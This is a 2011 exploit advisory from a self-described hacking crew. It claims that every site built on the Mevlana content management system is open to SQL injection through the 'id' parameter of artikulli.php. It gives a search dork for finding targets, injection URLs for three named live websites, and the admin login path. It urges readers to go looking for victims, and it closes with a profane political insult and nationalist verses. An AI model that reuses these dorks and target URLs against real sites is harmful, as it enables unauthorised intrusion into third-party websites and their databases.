========================================================================= Mevlana Content Management System SQL-i Vulnerability ========================================================================== +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+= +=+=+= +=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+= +=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+= +=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+= +=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+= +=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+= +=+=+= |_____________________|+=+=+= +=+=+= +=+=+= +=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+= +=+=+= +=+=+= +=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+= +=+=+= +=+=+= +=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+= +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 0 0 1 ########################################### 1 0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]Title :.......Mevlana Content Management System SQL-i Vulnerability [+]Author :......**RoAd_KiLlEr** [+]Tested on :...Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: sukihack[at]gmail[dot]com [~] Home: http://1337day.com/author/2447 & http://road-killer.blogspot.com [~] Vendor: http://www.mevlana-art.com ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+] DORK: Powered by Mevlana-Art. [+] Description: Ndertimi i portaleve dinamike me PHP/MYSQL (Mevlana Content Management System). - Dizajnimi i web-faqeve me hmtl, flash etj. - Optimizimi i webfaqeve: rritja e performancės dhe shpejtėsisė sė shfaqjes, SEO, Cross-Browser Compatibility - Konvertimin e faqeve nė XHTML Valid. [ I ]. SQL-i Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [+++] Important: Every web page developed by Mevlana-Art is vulnerable to Sql-Injection. Use the Dork to find websites,than find any "php" file with "id" parameter [ artikulli.php?id=]. [P0C]: http://127.0.0.1/artikulli.php?id= [ SQL INJECTION] [L!v3 D3m0's]: http://fatmirmuja.com/artikulli.php?id='46 http://www.islamgjakova.net/artikulli.php?id='2453 http://www.albisa.org/artikulli.php?id='109 [Admin Login] http://127.0.0.1/include/login.php?from=admin/index.php Good Luck :D [+] TIME TABLE: 06 June 2011 - Vulnerability discovered. 07 June 2011 - Advisory released. =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** says: FUCK BDI,Mbasi jeni qaq lesha me votu BDI,Ishalla jav venon kishat ke Shpija. PDSH 4 Life. =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: r0073r | indoushka | Sid3^effects | jdc from jeffchannell.com | DoNnY | MaFiTeRRoR | All 1337day Members | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN ===========================================================================================